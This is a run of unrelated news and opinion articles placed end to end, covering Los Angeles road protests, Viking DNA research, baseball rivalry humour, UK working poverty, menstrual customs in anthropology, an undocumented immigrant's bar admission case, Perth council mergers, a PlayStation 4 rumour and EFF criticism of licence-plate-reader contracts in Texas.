Mad Mar Vista mom Linda Jones made good on her promise to stage a protest this past Sunday on Venice Boulevard over the street's deteriorating condition. About 20 protesters joined Jones over the weekend, Patch reports, and they were greeted warmly by drivers and cyclists navigating the street's pockmarked and rutted surface. The California Department of Transportation did inform Jones that Venice will be smoothed over this summer "at the earliest," but Jones is dubious: "I really don't think it's going to happen that soon, if ever." State Senator Ted Lieu was invited to the protest, but didn't show. His rep said "grinding and paving" has already taken place on Venice in the past few weeks and Caltrans has put out bids for a permanent fix. Meanwhile, Jones says, "Cars are almost hitting other cars or almost hitting bicyclists ... It's horrendous."
· Crowd Gathers to Protest Caltrans [Patch]
· Mar Vista Mom Fighting for Less Pot-Holey Venice [Curbed LA]
Researchers are continuing the Discover more about the Vikings and how they spread across much of northern Europe during the early Middle Ages. In an article published this month in Philosophical Transactions of the Royal Society B it was revealed that Norse women accompanied their men when they colonized the North Atlantic.
The article, Mitochondrial DNA variation in the Viking age population of Norway, examined 45 Norse skeletons dating from between 796 and 1066 AD that were found in Norway. The researchers took DNA samples and found that that they matched with modern-day people living in the North Atlantic isles, in particular from the Orkney and Shetland Islands.
Maja Krzewinska, one of the researchers behind the study on the Norwegian Viking Genetics, said ”We are working with the mitochondrial DNA, which is inherited through the female line, from a number of Norwegian individuals from the late Iron Age. We compare them with both modern and prehistoric groups in northern Europe, and we show that the Norwegian Vikings are not completely genetically identical to modern humans in Norway. We can also show that our Norwegian Vikings brought Norwegian women when they colonized Iceland and went to other areas. It fits well with what we know from written sources and gives us an exciting picture of how migration was done in groups with high mobility like the Vikings”.
This news follows up on research released earlier this year, that showed nearly one million Britons, or one in 33 men across the United Kingdom, have some Norse ancestry. The study, carried out by BritainsDNA, revealed that in the northern islands of the Orkneys and Shetlands over a quarter of men could trace their roots to the Norse peoples, while in Wales only about 1% of people have some Scandinavian heritage.
Jim Wilson, chief scientist at BritainsDNA, explained, “Despite arriving well over 1,000 years ago the Viking legacy still remains strong in Britain and Ireland. The research suggests that the concentration of Norse blood is quite variable, but as the Y chromosome only relates to the nation's male population and only to one ancestral lineage for each man, there is a very real chance that many more of us are related to the Vikings.”
We also might be getting some more news related to genetics and the Vikings, as researchers at the University of Copenhagen are set to begin a study to examine the DNA of Greenlanders. Ida Moltke, who is leading the study, explains that “Greenlanders constitute a very small population group which, by reason of its isolation, markedly stands apart in genetic terms from other population groups.”
She hopes that by sampling the DNA of 4,500 individuals living in Greenland, they can determine if these people are solely the descendants of the Inuit who settled on the island in 13th century, or were they mixed with the Viking inhabitants and other Paleo-Eskimo groups.
Smartphone and Tablet users click here to sign up for
our weekly email
It's hard to find reasons to hate the Royals, but as the opponents to the Orioles in this year's ALCS, they are now our sworn enemies. This is the way that it works. You might think that there is little reason to hate the Royals or to feel superior to the team or its town. And sure, both teams are in the ALCS for the first time in a million years. It might warm your heart to think that no matter what happens, a team that hasn't been in the World Series since the 1980s will be there again. Stop that! Stop liking them! Sure, the Orioles and Royals haven't played in a meaningful series against each other in recent memory. They have never faced off in the playoffs, neither team has spent time dominating the other or embarrassing the other. But there are things to hate. There have to be things to hate.
Billy Butler's Brutal Beating of Brad Bergesen
Picture it: O's rookie Brad Bergesen was en route to greatness in 2009. The soft tossing right-hander was shocking the league with his effectiveness. He was pitching deep into games, he was shutting down teams left and right, he was winning hearts in Baltimore. After 18 starts in 2009, Bergesen was pitching to a 3.56 ERA and averaging 6 1/2 innings per start. On July 30th he pitched seven brilliant innings against the Royals. With two outs in the sixth, that brute Butler lined a ball back at Bergesen that ricocheted off of his shin. Catcher Matt Wieters grabbed the ball and threw Butler out at first to end the inning and Bergesen bravely made it to the dugout before collapsing. Butler's ball knocked Bergesen out for the rest of the season, and in fact ruined his career.
You can say that Bergesen was never a real prospect to begin with, and that his luck would have run out eventually. You can say that, while unfortunate, it's not like Butler meant to hit Bergesen. All I know his that before Butler hit Bergesen with the liner, Bergesen's ERA was 3.43. After, it was 5.09. Bergesen didn't play in the majors after 2012. The last I heard of him he had signed with the Chunichi Dragons in Japan.
Damn you, Billy Butler.
Recent Domination
Since 2009, the Royals a head-to-head record against the Orioles that can only be described as total domination. Yes, in their last 46 games against each other, the Royals are 24-22 against our beloved Birds. The big, bad Royals have taken pleasure in beating the Orioles 53% of the time, including winning the season series in three of the last six years. Everyone is talking about the Royals being a Cinderella story and the ultimate underdogs, but the Orioles haven't seen that side of them at all.
Poor Treatment of Former Orioles
Earlier this year the Royals mercilessly released their loyal pitcher, former Oriole Bruce Chen. Since 2009, Chen gave the Royals his heart, his soul, and his best knock knock jokes. And how did they reward him? By giving him the boot! He is just a year removed from putting up a 3.27 ERA for the Royals, but they didn't care. They cut him loose simply because he was unable to retire any batters this year. Well I never!
And remember the loveable Jeremy Guthrie? He's still on the team, having logged >200 innings for the Royals in each of the last two seasons. But over on Royals Review, I saw some people hoping they don't use Guthrie in the postseason rotation. The nerve! Just because he has a 4+ ERA on the season? They totally discount all of his intangibles, such as his awesome Twitter presence and his crazy shoe collection.
OK, so there really aren't many things, baseball-wise, for which we can dislike the Royals. But there are plenty of reasons that Baltimore, MD is better than Kansas City, MO. Right?
The Wire vs. Mama's Family
If you look on Wikipedia (source of all facts) for shows set in Kansas City, the longest running show that took place there was Malcolm and Eddie, a show starring Malcolm Jamal Warner and Eddie Griffiths that ran from 1996-2000 on the now defunct UPN. But when I think of shows from Kansas City, I think of Mama's Family.
Technically Mama's Family took place in Raytown, but when I visited Kauffman Stadium a few years ago I noticed that Raytown is just down the road from Kansas City. So while the city of Baltimore is home to the greatest television show in history, The Wire, Kansas City's television claim to fame is...Mama. And I bet the Royals fans even prefer it! (They would!)
Mama, is you taking notes on a criminal ****ing conspiracy?
"Charm City" vs. "City of Fountains"
OK, so Charm City is a nickname for Baltimore that was just made up in the 70s by some advertising executives that were trying to make Baltimore sound less gross. And Kansas City's nickname of City of Fountains is based on the fact that they actually have at least 10,000 fountains in their city, including at Kauffman Stadium. When I visited Kansas City my friends and I took pictures with every fountain we could find, because we're awesome. But doesn't Charm City just SOUND better? City of Fountains? It doesn't roll of the tongue. Charm City may have been randomly made up, but it's taken on a life of its own as the nickname to our town. It's just better.
State Flags
Presented without comment:
vs
OK, so it would just be easier to get all worked up if the Orioles were playing the Yankees or the Red Sox or basically any team other than the Royals. I guess this series will have to just be all about loving the Orioles instead of about hating our enemies. But make no mistake, Kansas City: we will defeat you, no matter how nice you are or how delicious your barbecue tastes.
More than 7 million people in the UK are living in poverty despite being part of a working family, according to a study which uncovers how deprivation is increasingly linked to the high cost and insecurity of private rented accommodation.
The report, commissioned by the Joseph Rowntree Foundation (JRF) also found that disability is increasingly linked to the changing nature of poverty. If the costs of disability are taken into account, half of those in poverty are either disabled or living with a disabled person.
Overall poverty levels have remained flat since 2010, in part because of a general economic recovery, according to the study carried out by the New Policy Institute, which researches issue connected to poverty and housing.
However, it warns that much of this is down to steady economic growth. The JRF is urging the government to carefully monitor changes in poverty amid the repercussions of Brexit.
There were 13.5 million people living in households classified as poor in 2014-15, defined as below 60% of the median once housing costs are deducted. This is 21% of the UK population, a proportion barely changed in more than a decade.
However, the report found, 55% of those in poverty are now in working households, a record high. This comprises a total of 7.4 million people – 1.1 million more than in 2010-11 – among them 2.6 million children.
In contrast, there are 400,000 fewer pensioners in poverty from a decade ago, despite there being 1.7 million more people in that age bracket, the study, Monitoring Poverty and Social Exclusion 2016, reported.
A significant factor in these shifts, the study said, was the increased number of people living in expensive and insecure private rental properties, with the number of people in poverty in private lets doubling in a decade to 4.5 million.
“Failures in the housing market are a significant driver of poverty,” the study said. “This is primarily, but not entirely, due to costs.”
The number of all rental eviction has risen by 60% over five years to 37,000 annually, it said, with a particularly steep recent rise in private evictions. Over the same period mortgage repossessions have fallen from 23,000 to 3,300.
Among those in the bottom 20% of the income bracket who live in private rented homes, 73% pay more than a third of their income in rent, the report said, compared with 50% of social renters and 28% of owner occupiers who do so.
The number of private renters living in poverty has doubled over the past decade, the data showed, meaning there are now as many private renters in poverty as social renters.
Cuts to benefits were also identified as a factor in poverty. “Increasingly, the social security system does not cover the full cost of essentials for those on low incomes, such as rent and council tax,” the report said.
This was likely to get worse with the reduction in the overall benefit cap, the authors said, with 112,000 families expected to experience a reduction in income because of the cap, up from the current 20,000.
The rent gap: what is the local housing allowance? Read more
The report also found significant regional differences, with high rental costs seemingly playing a role in this. London and south-east England, where housing costs have risen in recent years, has the highest poverty rate at 27%, 6% above the UK average.
Any overall increase in poverty levels has been held off in part by record employment levels, the report noted, with the figure of 1.4 million children living in workless households being the lowest recorded.
But much more needed to be done, said Helen Barnard, the head of analysis at the JRF. “The UK economy is not working for low-income families,” she said. “The economy has been growing since 2010 but during this time high rents, low wages and cuts to working-age benefits mean that many families, including working households, have actually seen their risk of poverty grow.
“As it negotiates Brexit, it is vital that the government does not allow its focus to slip from the domestic concerns that make a huge difference to people who are just about managing. This report shows that people on low incomes cannot rely on economic growth and rising employment alone to improve their financial prospects.”
A spokeswoman for the Department for Work and Pensions said: “Since 2010, the number of people living in poverty has fallen by 300,000, but we know there's more to do. We're increasing the national living wage and taking millions of people out of income tax, to make sure it always pays to be in work.”
However, Debbie Abrahams, the shadow work and pensions secretary, said the report showed “the true impact of six wasted years of Tory austerity, with 7.4 million people in poverty in working households”.
She added: “This government has no plan to tackle stagnant wages and rising insecurity, choosing instead to make the poorest pay for their economic mismanagement.”
These days we tend to assume that menstrual seclusion, menstrual taboos, menstrual huts and pollution beliefs, which are prevalent in some developing countries, are all examples of sexist practices that undermine women's rights and freedoms.
But what if seclusion once gave women a safe space, where they could find solidarity with other women? Suppose those taboos were first invented by women for reasons of their own?
Social anthropologists are never content with the way things are seen in their own culture. We try to abandon our preconceptions, in order to understand other ways of seeing. And so it needs to be said that there are two sides to menstrual taboos. Yes, they can become expressions of patriarchal oppression, but look deeper into their origins and we discover a different world.
Among many hunter-gatherers to this day, menstrual blood connotes potency, not pollution. Menstruating women and girls have privileged shamanic access to the spirit world, often imagined as connection to the Moon, “women's biggest husband”. This potency demands such respect that women are inviolable and no man dares infringe these taboos for fear of destroying his hunting luck.
Live Q&A: Menstruation is keeping girls out of school - what can we do? Read more
Could menstruation and its observances in fact be experienced as empowering for women? Take the menstrual traditions of the Yurok Indians who live in north-western California. Here, a woman would go on strike once a month for 10 whole days, declaring herself “on her Moontime”. It was her time off. She didn't cook for her husband or do household chores. It was believed that a woman should seclude herself during her flow because “she is at the height of her powers”. Such time should not be wasted in mundane tasks, distractions or worries about the opposite sex. Rather, all her energies should be applied in concentrated meditation “to find out the purpose of your life”.
In the old days, menstruating Yurok women would communally bathe and perform rituals in a “sacred Moontime pond” up in the nearby mountains. In belief, all the fertile women in a household who were not pregnant menstruated “at the same time, a time dictated by the Moon”, when they practised their bathing rituals together. If a woman fell out of phase with the Moon, breaking synchrony with her sisters, she could “get back in by sitting in the moonlight and talking to the Moon asking it to balance her”.
Facebook Twitter Pinterest Three Kalasha sisters sitting together Rumbur Valley, Chitral, Pakistan
Photograph: Alamy Stock Photo
Anthropologists have described how withdrawal of sexual and domestic services was in many cultures on women's terms. Far from being oppressive, so-called “seclusion” could be experienced as special time. In 2001, Wynne Maggi described what happens regularly to this day inside the bashali, a communal menstrual house used by women among the Kalasha people of north-west Pakistan.
In this community, there are no isolated menstrual huts. Instead, there is a large sacred building serving as a communal meeting house for the women, who see it as the physical centre for their solidarity and freedom. Women congregate here when menstruating or giving birth, so that at any one time there may be as many as 20 women inside, gossiping, laughing and singing together, many with babies and toddlers. During their stay in what they call their “most holy place”, women compare notes on the duration of their menstrual flows.
The men express pride that in this society, “our women are free”, despite the fact that the bashali building is off-limits to them. Women who want to escape their husbands for a few days can use it as a refuge. Maggi describes graphically how women enjoy the intimacy of sleeping overnight in the bashali, arms and legs wrapped closely together. What happens in the bashali is women's secret, so much so that men don't even have the words to ask what happens there. The special house for women is the biggest building in the village. Like so many men's houses or temples in patriarchal societies, but the other way round, it is one from which half the population is excluded.
Among African hunter-gatherers, where gender egalitarianism is strong, a girl's first menstruation triggers special celebrations embracing the entire community. For hunter-gatherers of the Ituri Forest in the eastern part of the Congo, the elima ritual is a collective and joyous affair. Lasting several moons, activities centre on an elima hut, which is in fact the most impressive structure ever used – more like a temple at the centre of the community.
Girls who have recently begun menstruating go inside with older women to be given practical lessons about boys and sex, but mainly to learn ancient, polyphonic songs and the hut resounds with their singing. The girls emerge “on the warpath” to playfully hunt out boys with big whippy sticks. Festivities revolve around this sexual wargame of girls laughingly chasing boys and the boys countering and teasing back. If any boy gets whipped, he must try to enter the elima hut, assuming he can get past the mums and aunties guarding the entrance. In this way elima becomes a type of initiation for both sexes, very much on the girls' terms.
In Blood Relations, his classic work on the anthropology of menstruation, Chris Knight argues that women invented culture. He traces the origins of sexual morality to female self-organisation and collective resistance toward bad behaviour in males. Knight argues convincingly that women could not command respect if they allowed men to take sexual access to them for granted. The way to get men to be helpful was to make clear that sex was conditional on good behaviour. To make this work, women had to establish, at least periodically, the most fundamental rule of all, that “No means No”. As Knight puts it: “If the body is not sacred, nothing is.”
Dr Camilla Power is a senior lecturer in anthropology at the University of East London and a member of the Radical Anthropology Group which discusses these questions in Central London on Tuesday evenings. All welcome.
Join our community of development professionals and humanitarians. Follow @GuardianGDP on Twitter.
Sergio Garcia (not the racist golfer) has lived in California most of his life. He worked his way through law school and then took and passed the California bar exam on the first try.
Yesterday, the California Supreme Court heard argument on whether Garcia could be admitted to practice law.
Sergio Garcia was brought to the United States when he was 17 months old. The California justices must decide whether an undocumented immigrant can be admitted. The State of California says yes. The Obama Administration says no.
The news coverage of the case implies that California has the equities on its side while the Obama Administration has the law.
It's a tidy narrative for a story, but the media hasn't really focused on the briefs, because when you actually unpack the statute the administration cites, it requires tortured mental gymnastics to support rejecting Garcia's application….
You may remember the broad outline of this case from our prior coverage. Basically, Garcia came here at 17 months, was taken back to Mexico at 9, and returned at 17 years old and applied for citizenship, sponsored by his father who had since become an American citizen. His application for citizenship was filed in 1994. In the intervening 19 years, Garcia has worked hard and managed to finance himself through Cal Northern School of Law. From a school with a 45 percent bar passage rate at last report, Garcia's passing on the first try defied the odds.
So we have a guy brought here illegally as a child, with no criminal record, who demonstrates a drive for personal achievement. Seems like the model DREAM Act case. Except he's too old for the program.
The Department of Justice argues in an amicus brief that the Personal Responsibility and Work Opportunity Reconciliation Act, passed in 1996, precludes undocumented aliens from receiving commercial and professional licenses issued by states and the federal government. So whether or not it aligns with the administration objectives outlined in the DREAM Act, Obama is bound by the law to oppose Garcia's admission. It's odd, because of all the legislative commands of Congress in 1996, it seems as though Congress might have cared a little bit more about that other law that Obama told the DOJ to stop enforcing.
Specifically, the DOJ argues that the 8 U.S.C. § 1621(c)(2) bars states from providing a variety of benefits, including certain licenses, to undocumented persons unless the state passes a statute specifically authorizing the benefits. To quote the DOJ brief:
Therefore, Mr. Garcia seeks a “professional license… provided… by appropriated funds of a State or local government.” 8 U.S.C. § 1621(c)(2).
Important life lesson: If an adversary inserts an ellipsis into a direct quote of a statute or contract, they're probably trying to deceive. If an adversary inserts two ellipses into a direct quote of a statute or contract, they're definitely trying to deceive.
The relevant text of 8 U.S.C. § 1621(c)(2) is the entirety of subsection (a):
any grant, contract, loan, professional license, or commercial license provided by an agency of a State or local government or by appropriated funds of a State or local government
The DOJ fixates on the “appropriated funds” argument because it concedes that the California judiciary, the issuer of law licenses, does not constitute an agency under prevailing law. It then argues that, while the courts are not an agency, the courts are funded by state funds and therefore everything they do, including granting licenses, is therefore “provided… by appropriated funds.”
But placing the “professional license” language in context shows how dumb that argument is. Plain English doesn't support the idea that licenses are “provided… by appropriated funds.” The license is not provided by funds. The entity issuing the license may be provided funds, but the license itself has nothing to do with funds. The indirect leap is just not supported on the face of the sentence.
Meanwhile, a “grant, contract, loan” could easily be “provided… by appropriated funds.” The “appropriated funds” language is a catch-all to prevent third parties like an independent contractor from handing out state money through grants, contracts, or loans. The drafting is a sloppy combination of what was intended to be a bar on agencies handing out money or licenses and a catch-all that was intended to prevent private contractors funded by state money from hiring undocumented immigrants.
For all the textualists out there, this is probably how the drafting happened:
Staffer A: So I just combined those two provisions to save time.
Staffer B: But they don't really overlap entirely.
Staffer A: Who cares? No one is going to read that much into it. Besides, it's Ladies' Night at [insert douchebag D.C. bar here], so let's pop our collars and go talk about how impressive our bottom-rung Hill job is as though that's a pickup line!
Staffer B: Awesome, bro!
Indeed, if the DOJ reading is correct, the entire language about “agencies” becomes redundant because agencies per se receive appropriated funds. It can be excised from the statute with no effect if the DOJ is right. That's a red flag.
But at oral argument, most observers saw the California Supreme Court leaning the other way:
Justice Goodwin Liu said it was “commonsensical” that Congress meant to include lawyer licenses in the law. The five other justices on the court made similar comments, essentially arguing that the law bars them from making Garcia a lawyer unless the state Legislature acts.
And that's probably true. The Contract With America Congress probably did hope to include law licenses. But waterboarding the plain meaning of the sentence to suggest that the “appropriated funds” language includes courts giving zero dollars to someone just because Congress failed to understand the scope of “agencies” isn't justified by a vague guess as to what Congress thought. This is distinct from the average legislative intent question because the concept of courts not being agencies and yet issuing law licenses was foreseeable in 1996 and yet ignored.
The full DOJ brief is reproduced on the next page….
A Democratic congressman is trying to give the federal government the power to regulate pizza in public school lunches, following a failed attempt last year.
The legislation proposed by Rep. Jared Polis, D-Colo., would end pizza being counted as a vegetable in school lunches and allow the government to set nutritional standards.
Polis said Congress and fast-food lobbyists were able to nix a similar Agriculture Department plan last year. Frozen-pizza manufacturers are still able to have their product counted as a vegetable based on its tomato paste content.
The congressman said he's got nothing against pizza in school lunches, but it shouldn't be considered a vegetable because it includes sugar, salt and other ingredients that carry a high amount of fats and carbohydrates while childhood obesity and Type II diabetes remain a major concern.
“Pizza has a place in school meals,” Polis said in a statement. “But equating it with broccoli, carrots and celery seriously undermines this nation's efforts to support children's health and their ability to learn through better school nutrition.”
A NEW “City of South Park” will be created as part of plans to slash the number of councils in Perth from 30 to 16.
The Barnett Government today announced its response to the Local Government Advisory Board report on metropolitan local government reform.
Local Government Minister Tony Simpson has accepted all but two of the report's boundary recommendations in the biggest shake-up of councils in 100 years.
But his plan to change City of Perth boundaries has already hit a snag, with Labor and the National Party saying they will not support forced amalgamations.
Mr Barnett will introduce legislation into parliament which will force the City of Perth and the City of Vincent to merge, as well as take in such icons as the University of WA, QEII Medical Centre and Kings Park.
Labor leader Mark McGowan said his party would not support the City of Perth Act. The Act is the only part of the Barnett Government's merger plans that needs to be ticked off by Parliament.
And National Party Terry Redman today reaffirmed the party's opposition to forced amalgamations.
As revealed by The Sunday Times, a merger between City of South Perth and the City of Victoria Park will result in a new council called South Park.
The profanity-filled cartoon of the same name follows the hilarious exploits of Cartman, Kenny, Stan and Kyle in a fictional town located in The Rock Mountains of Colorado.
The City of South Park will include the Burswood peninsular, home to Crown Perth and the new Perth Stadium.
While the new council will collect rates from Crown Resort, the State Government will continue to hold planning and development authority.
Mr Simpson rejected the board's recommendation for the City of Perth/City of Vincent and the proposed City of Riversea, which includes five western suburbs councils.
This was on the basis that key sites such as the University of Western Australia and the Queen Elizabeth II Medical Centre were not included in the enlarged City of Perth.
As also revealed by The Sunday Times, the State Government will introduce a City of Perth Act to set the city's new boundaries and “ensure it has the status it deserves as Australia's west coast capital”.
“The City of Perth must be better-equipped to respond to the demands of a growing State and better represent WA in the international market. So, as well as including the City of Vincent in the City of Perth boundaries, which the Board recommended, the City of Perth Act will also include UWA, Kings Park and QEII,” Premier Colin Barnett said.
“Except for the City of Perth and City of Riversea, the State Government endorses the Board's recommended boundaries. This report provides a clear direction for the most significant step forward for local government reform in 100 years and people in the metropolitan area can clearly see how this process will affect them and the local government authority in which they will live.”
Yet Opposition from Labor and the Nationals to the City of Perth boundary changes are set to throw a spanner in the works.
“Our position hasn't changed. The Nationals WA do not support forced local government amalgamations,” Mr Redman said.
Without the Nationals support in the Upper House, where they hold the balance of power, Mr Barnett cannot pass laws.
Mr McGowan told the media: “This is a dog's breakfast of a policy approach,” he said.
“It has impacted local democracy and it is all a problem of the Premier's own making.
“The costs associated with these forced amalgamations increases costs for local communities and local ratepayers and it also reduces local say.
“The government had a commitment at the last election of no forced amalgamations.
“And yet the government today, arrogantly ignores its own promises.”
●MAP: Check out the new boundary changes
The new local governments will start in July, with elections held next October. The average population in the councils will be about 114,000, compared with 63,000 before the changes.
The number of councillors will be reduced by 111 and there will also be 14 fewer CEOs. The State Government said would save $66 million over 10 years.
The names of the new local governments are interim names that will be used in the early stages of their operations.
Once the new councils are in place the new councils can decide to consult the community on whether to have another name.
There will be nine boundary changes and three amalgamations. Only residents of the six councils affected by amalgamations will be able to trigger a poll.
Mr Simpson said while he was rejecting the recommendation for a new City of Riversea – which included Nedlands, Claremont, Cottesloe, Mosman Park and Peppermint Grove – reform in the western suburbs was still needed.
“The State Government is in very strong support of the Board's recommendation for an amalgamation of those five western suburbs councils, particularly given the report clearly demonstrates the benefits of fewer western suburbs councils,” he said.
The report recommends the following local governments be joined by boundary adjustments:
● City of Swan and Shire of Mundaring to form City of Swan
● City of Bayswater and Town of Bassendean to form City of Bayswater
● City of Belmont and Shire of Kalamunda to form City of Belmont
● City of Subiaco and Town of Cambridge to form City of Subiaco
● City of Armadale and the north of Shire of Serpentine-Jarrahdale to form City of Armadale
● Shire of Murray and the south of Shire of Serpentine-Jarrahdale to form Shire of Murray
● City of Canning and City of Gosnells to form City of Gosnells
● A modified City of Stirling
● A modified City of Melville
The report recommends six local governments be amalgamated into three:
● City of South Perth and Town of Victoria Park to form City of South Park
● City of Fremantle and Town of East Fremantle to form City of Fremantle
● City of Kwinana and City of Cockburn to form City of Jervoise Bay
The cities of Joondalup, Rockingham and Wanneroo are not affected by the local government boundary changes.
The announcement today received a mixed response from mayors.
City of Perth Lord Mayor Lisa Scaffidi said the Premier and Minister had made a “strong stand to ensure all Western Australians have a strong and effective capital city”.
“We look forward to understanding how the Government intends to address the challenges posed for all parties in the proposed merger with the City of Vincent,” she said.
“We will work collaboratively with the government and ensure our stakeholders are made aware of the implications of such a merger.
“Our shared goal remains creating a stronger capital city for all Western Australians.”
On Twitter, City of Vincent mayor John Carey hit out at plans for legislation for the City of Perth, saying: “Colin Barnett ignores independent umpire recommendation to pursue City of Perth Act. Uncertainty continues. Groundhog Day for Vincent!”
Shire of Kalamunda president Sue Bilich said the decision to adjust Belmont's boundaries to take over Kalamunda was “an absolute disgrace”, saying residents had been denied a vote on their future.
“Residents have made it very clear to the State Government, they wanted the democratic right to vote on the issue of Local Government Reform,” Mrs Bilich said.
“A recommendation for an amalgamation would have allowed for this.”
“However, the recommendation by the Local Government Advisory Board that was accepted and announced by the Minister today is for a boundary adjustment, which does not trigger the poll provisions and is directly against the will of the people.”
Cockburn mayor Logan Howlett said the outcome was bittersweet as it faced having to lose the suburbs of North Coogee and Hamilton Hill to Fremantle and Coolbellup, North Lake, Jandakot City and it's part of Leeming to Melville.
“The new City of Jervoise Bay will form a strong and robust local government with the capacity to deliver dynamic and sustainable services to its residents through a vibrant and engaging staff supported by an active volunteer base,” said Mr Howlett.
Fremantle welcomed the announcement that it will amalgamate with the Town of East Fremantle and expand its boundaries to include Bicton, Palmyra, Hamilton Hill, part of North Coogee and Rottnest.
“The decision reinforces Fremantle status as Perth's second city and recognises Fremantle unique character,” Fremantle Mayor Brad Pettitt said.
Stirling Mayor Giovanni Italiano said his council was bitterly disappointed by the decision to cut its boundaries.
Churchlands, Herdsman and parts of Wembley and Wembley Downs will transfer to the new
City of Subiaco. Inglewood and parts of Dianella, Mount Lawley, Menora and Yokine will transfer to the new City of Bayswater.
“We remain unconvinced this decision is in the best interest of the ratepayers who will likely pay the ultimate price through increased rates and fewer services,” Mr Giovanni said.
CCI, WA's peak business body, welcomed the inclusion of UWA, Kings Park and QEII in the City of Perth, saying the move should allow for future expansions to include other assets.
CCI CEO Deidre Willmott said: “CCI has long called for local government reform that focuses on making our third tier of government more efficient and more focused on facilitating sustainable economic development for the benefit of all rate payers.”
Tech Insider The PlayStation 4 is only a little over two years old, but Sony is reportedly working on a new version of the console with more graphics power and support for 4K resolution in games, Kotaku reports.
Sources told Kotaku's Patrick Klepek that Sony has begun briefing developers about a new PlayStation 4 with a beefed-up graphics processor that's capable of pushing 4K resolution for games and better overall processing power.
The PlayStation 4 can currently support 4K videos, but it doesn't support 4K games.
One of the possible reasons for this move is virtual reality. As we previously reported, Sony will release its PlayStation 4-powered virtual reality headset in October for about $500. Not many regular PlayStation 4 games really need 4K resolution, but 4K is super important for making virtual reality feel fluid, realistic, and immersive. Considering Sony's investment in VR, we'd guess this is the main reason there's a souped-up PlayStation 4 in the works.
That said, there are still plenty of important details we don't know about yet. For instance, we don't know how much this new console will cost, or if Sony plans to offer an upgrade system for the 36 million people who currently own a PlayStation 4. We also don't know if there will be a difference in games that support 4K versus ones that don't, especially when it comes to price. Sony was not immediately available to comment.
If this report is indeed true, it might be just one of several new game consoles to debut later this year. Nintendo will reportedly debut a new game console called the NX this year, and Kotaku's report even mentioned the possibility of Microsoft releasing an upgraded Xbox One. Between these new consoles and all the virtual reality headsets coming out over the next several months, it should be an extremely busy year in gaming — and a great year for video game fans.
You can read Kotaku's full report here.
At the beginning of the year, the City of Kyle, Texas, approved a controversial agreement to install automated license plate recognition (ALPR) technology in its police vehicles. The devices would come at no cost to the city's budget; instead, police would also be outfitted with credit card readers and use ALPR to catch drivers with outstanding court fees, also known as capias warrants.
With each card swipe, an added 25% surcharge would go to Vigilant Solutions, the company providing the system. As an added bonus the company would also get to keep all the data on innocent drivers collected by the license plate readers—indefinitely.
But before the license plate readers could even be installed, the Kyle city council voted 6-1 to rescind the order. The reason: public and media outcry over how the system would turn police into debt collectors and data miners.
“It's a little Big Brother-ish for me. It's a little too invasive for me,” Councilmember Daphne Tenorio said at the February 16 hearing. “I'm uncomfortable with it...Because my husband's in IT, I see what happens and, for me, personally I can't justify it.”
The February meeting was the city's mulligan. Councilmembers grilled Vigilant Vice President of Sales Joe Harzewski with hard questions that should've been raised the first time around, such as what data is collected, where is the data stored, how long is it stored, how is it shared, and how is it protected.
The answers were unconvincing.
The Deal With Vigilant
ALPR systems are high-speed camera networks that capture license plate images, convert the plate numbers into machine-readable text, geotag and time-stamp the information, and store it all in database systems for later retrieval. ALPR does not distinguish between criminal suspects (or in this case, delinquent fine payers), and instead captures sensitive location data on all drivers. In aggregate, the information can reveal personal information about a driver's life, such as where they attend church, what doctors they visit, and where they sleep at night. Vigilant even advertises that ALPR can be used to predict a target's movements and establish their associates.
In late January, EFF published a report about Vigilant's latest business scheme: licensing ALPR systems to law enforcement agencies for free, in exchange for their participation in what Vigilant calls its “Warrant Redemption Program.” In addition to the City of Kyle, we found records that the City of Orange and Guadalupe County in Texas had also signed similar deals.
Groups like the Texas Civil Rights Project (TCRP) believe these arrangements are unfair, and likely illegal, because they put the cost of the entire mass surveillance system on the backs of people who owe fines—probably because they couldn't afford the fees to begin with. Under Texas law, any additional fees are supposed to be reasonable and directly connected to the cost of fine collection. As we discovered, the 25% fee doesn't just pay for the fine collection, but an arsenal of law enforcement tools including unlimited capture and storage of plate scans, data-crunching software, and access to Vigilant's private database of 4.5 billion plate scans.
As TCRP Legal Director Wayne Krause Yang told the International Business Times:
It really worries me that this corporation is sort of privatizing the police department to become bounty hunters—and pay Vigilant for the privilege. It seems to me that this will put the burden unfairly on those who can least afford it. It would not surprise me that it would result in people being in jail who don't deserve to be there.
Indeed, the program creates a troubling partnership between government and the private surveillance sector. Usually governments purchase products or licenses from vendors out of their budget or grants. But Vigilant's “budget neutral” agreements have governments at a disadvantage.
Vigilant reserves the authority to cancel the program if it feels a law enforcement agency isn't making “best efforts” and “expediting and accelerating the normal rate of warrant clearance redemption.” This puts pressure on the officers to prioritize fine collection over other police work if they want to keep their new surveillance equipment. Mary Mergler, director of Texas Appleseed's Criminal Justice Project, told the Texas Tribune she worries that police will begin constantly searching for drivers with outstanding fines.
One of the most alarming elements of this relationship is that Vigilant also gets to keep the data—every plate collected by the city or county's ALPR system, regardless of whether the driver has a warrant. Even after an agency cancels the arrangement, Vigilant gets to hold onto that data indefinitely and share it with other law enforcement customers.
It was this point, a clause buried in a memorandum of understanding, that seemed to rankle the City of Kyle. After EFF published its report, Vigilant offered an amended contract promising that all data would be deleted if the city parted ways with the company.
The city council didn't even vote on the amendment. They just skipped right to telling Vigilant goodbye before it had a chance to collect any data at all.
What Vigilant Told the Kyle City Council
During the hearing, Vigilant revealed information that all policymakers should take notice of before approving or renewing a contract with the company.
One councilmember asked whether the company had ever had a breach. Instead of answering the question, Vigilant VP Harzewski played on semantics, asking the councilmember to define a “data breach.”
The councilmember responded, “Has anybody had unauthorized access to your servers?”
After a pregnant pause, Harzewski admitted that that has happened, but disclaimed Vigilant of any responsibility:
Not that I'm aware of and I say, “not that I am aware of,” because I would consider unauthorized access when someone from the city of Kyle or someone else within the City of Kyle maliciously gave access out to one of their friends. Is that a breach? I don't know the answer to that. It depends on how you define it. If it's considered a breach then certainly we've had breaches, because we've had people hand out access where they shouldn't have. Not us particularly, but our clients. And that's something we can't do anything about, in the sense that we give bulletproof technology to our clients. They're free to do with it as they see fit. We give them the complete control to ensure that what they decide to do with it is what happens to it.
With that, Vigilant made one of the strongest arguments against ALPR: the data is constantly at risk of being abused by individual users. And somehow Vigilant both knows and doesn't know when it has happened. In the next breath, Harzewski further lent credibility to the complaints of privacy groups:
So if you're asking me if we've ever had someone hack into our server, the answer is absolutely no, never. Have we had people try to hack into our server? Absolutely, tee-totally, yes. On many, many occasions. It's never been successful.
